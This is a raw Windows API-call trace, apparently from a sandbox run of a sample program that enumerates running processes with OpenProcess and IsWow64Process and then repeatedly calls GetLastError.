	[0070.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0070.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0070.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0070.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0070.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0070.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc50, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0070.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0070.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0070.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0070.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0070.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0070.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0070.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0070.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0070.921] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.921] CloseHandle (hObject=0x224) returned 1
	[0070.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0070.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0070.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728a98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0070.921] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.921] CloseHandle (hObject=0x224) returned 1
	[0070.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0070.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0070.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0070.921] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.922] CloseHandle (hObject=0x224) returned 1
	[0070.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0070.922] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.922] CloseHandle (hObject=0x224) returned 1
	[0070.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0070.922] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.922] CloseHandle (hObject=0x224) returned 1
	[0070.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0070.922] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.922] CloseHandle (hObject=0x224) returned 1
	[0070.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0070.922] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.922] CloseHandle (hObject=0x224) returned 1
	[0070.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0070.922] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.922] CloseHandle (hObject=0x224) returned 1
	[0070.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0070.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0070.923] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.923] CloseHandle (hObject=0x224) returned 1
	[0070.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0070.923] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.923] CloseHandle (hObject=0x224) returned 1
	[0070.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0070.923] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.923] CloseHandle (hObject=0x224) returned 1
	[0070.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0070.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0070.923] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.923] CloseHandle (hObject=0x224) returned 1
	[0070.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0070.924] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.924] CloseHandle (hObject=0x224) returned 1
	[0070.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0070.924] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.924] CloseHandle (hObject=0x224) returned 1
	[0070.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7288b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0070.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0070.924] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.924] CloseHandle (hObject=0x224) returned 1
	[0070.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0070.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0070.924] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.924] CloseHandle (hObject=0x224) returned 1
	[0070.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728978, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0070.924] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.924] CloseHandle (hObject=0x224) returned 1
	[0070.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0070.925] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.925] CloseHandle (hObject=0x224) returned 1
	[0070.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0070.925] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.925] CloseHandle (hObject=0x224) returned 1
	[0070.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0070.925] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.925] CloseHandle (hObject=0x224) returned 1
	[0070.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0070.925] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.925] CloseHandle (hObject=0x224) returned 1
	[0070.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0070.925] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.925] CloseHandle (hObject=0x224) returned 1
	[0070.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0070.925] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.925] CloseHandle (hObject=0x224) returned 1
	[0070.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0070.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0070.926] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.926] CloseHandle (hObject=0x224) returned 1
	[0070.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0070.926] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.926] CloseHandle (hObject=0x224) returned 1
	[0070.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0070.926] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.926] CloseHandle (hObject=0x224) returned 1
	[0070.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728858, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0070.926] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.926] CloseHandle (hObject=0x224) returned 1
	[0070.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0070.926] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.926] CloseHandle (hObject=0x224) returned 1
	[0070.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728818, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0070.927] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.927] CloseHandle (hObject=0x224) returned 1
	[0070.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0070.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0070.927] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.927] CloseHandle (hObject=0x224) returned 1
	[0070.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e8b0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0070.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0070.927] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.927] CloseHandle (hObject=0x224) returned 1
	[0070.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0070.927] GetLastError () returned 0x5
	[0070.927] GetLastError () returned 0x5
	[0070.927] GetLastError () returned 0x5
	[0070.927] GetLastError () returned 0x5
	[0070.927] GetLastError () returned 0x5
	[0070.927] GetLastError () returned 0x5
	[0070.927] GetLastError () returned 0x5
	[0070.927] GetLastError () returned 0x5
	[0070.927] GetLastError () returned 0x5
	[0070.927] GetLastError () returned 0x5
	[0070.927] GetLastError () returned 0x5
	[0070.927] GetLastError () returned 0x5
	[0070.927] GetLastError () returned 0x5
	[0070.927] GetLastError () returned 0x5
	[0070.927] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
	[0070.928] GetLastError () returned 0x5
